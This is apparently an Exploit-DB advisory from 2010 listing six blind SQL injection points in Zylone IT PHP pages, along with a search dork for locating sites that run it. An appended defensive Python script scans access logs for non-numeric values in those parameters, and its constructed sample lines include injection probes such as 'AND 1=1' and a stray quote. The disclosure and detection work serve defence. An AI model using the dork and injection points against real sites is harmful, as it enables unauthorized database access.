Zylone IT - Multiple Blind SQL Injections

EDB-ID: 14270
CVE: N/A
Author: Callo
Type: webapps
Platform: PHP
Date: 2010-07-08

# Exploit Title: Zylone IT Multiple Blind SQL Injection Vulnerability
# Date: 2010-07-08
# Author: Callo
# Software Link: http://www.zylone.com/
# Version: Unknown
# Tested on: php

10101010101010101010101010101010101010101010101010101010101010101010101010101010
0                                                                              1
1 ~# Title: Zylone IT Multiple Blind SQL Injection Vulnerability               0
0                                                                              1
10101010101010101010101010101010101010101010101010101010101010101010101010101010
0                                                                              1
1 ~# Date: 2010-07-07                                                          0
0                                                                              1
10101010101010101010101010101010101010101010101010101010101010101010101010101010
0                                                                              1
1 ~# Author: Callo                                                             0
0 ~# Home: www.gsk2.org                                                        1
1                                                                              0
01010101010101010101010101010101010101010101010101010101010101010101010101010101
1                                                                              0
0 ~# Software Link: http://www.zylone.com/                                     1
1 ~# Version: Unknown                                                          0
0 ~# Tested on: php                                                            1
1 ~# Dork: Powered by Zylone IT                                                0
0          Powered By: Zylone IT                                               1
1                                                                              0
01010101010101010101010101010101010101010101010101010101010101010101010101010101
1                                                                              0
0 ~# Exploit: http://localhost/[PATH]/news_details.php?news_id=[BLIND SQLi]    1
1             http://localhost/[PATH]/news.php?cat_id=[BLIND SQLi]             0
0             http://localhost/[PATH]/news_details.php?sec_id=[BLIND SQLi]     1
1             http://localhost/[PATH]/home.php?page_id=[BLIND SQLi]            0
0             http://localhost/[PATH]/events.php?cat_id=[BLIND SQLi]           1
1             http://localhost/[PATH]/policy.php?sec_id=[BLIND SQLi]           0
0                                                                              1
01010101010101010101010101010101010101010101010101010101010101010101010101010101
1                                                                              0
0 ~# Greetz: Whivack                                                           1
1                                                                              0
01010101010101010101010101010101010101010101010101010101010101010101010101010101
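
Added example (not part of the original advisory and not Zylone IT code): a defender-side check that scans web access log lines for the six script/parameter pairs listed above and flags any value that is not a plain integer. It assumes these id parameters are meant to be numeric, which the advisory does not state, and the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script/parameter pairs listed in the advisory.
WATCHED = {
    "news_details.php": {"news_id", "sec_id"},
    "news.php": {"cat_id"},
    "home.php": {"page_id"},
    "events.php": {"cat_id"},
    "policy.php": {"sec_id"},
}

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(log_line):
    """Return [(script, param, decoded_value)] for watched parameters whose
    value is not a plain integer (assumption: these ids are numeric)."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    script = url.path.rsplit("/", 1)[-1]
    hits = []
    # parse_qsl percent-decodes values, so encoded input is seen in clear form.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in WATCHED.get(script, ()) and not re.fullmatch(r"[0-9]{1,10}", value):
            hits.append((script, name, value))
    return hits


# Constructed sample log lines (not taken from any real system).
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Jul/2010:10:00:01 +0000] "GET /site/news_details.php?news_id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [08/Jul/2010:10:00:07 +0000] "GET /site/news.php?cat_id=3%20AND%201%3D1 HTTP/1.1" 200 4980',
    '203.0.113.7 - - [08/Jul/2010:10:01:00 +0000] "GET /site/home.php?page_id=4&lang=en HTTP/1.1" 200 7001',
    '203.0.113.9 - - [08/Jul/2010:10:01:30 +0000] "GET /site/policy.php?sec_id=2%27 HTTP/1.1" 500 310',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for script, param, value in suspicious_params(line):
            print(f"{script}?{param} non-numeric value: {value!r}")
```

The same integer-only rule, enforced in the application before the value reaches the query (together with parameterized statements), is the corresponding fix.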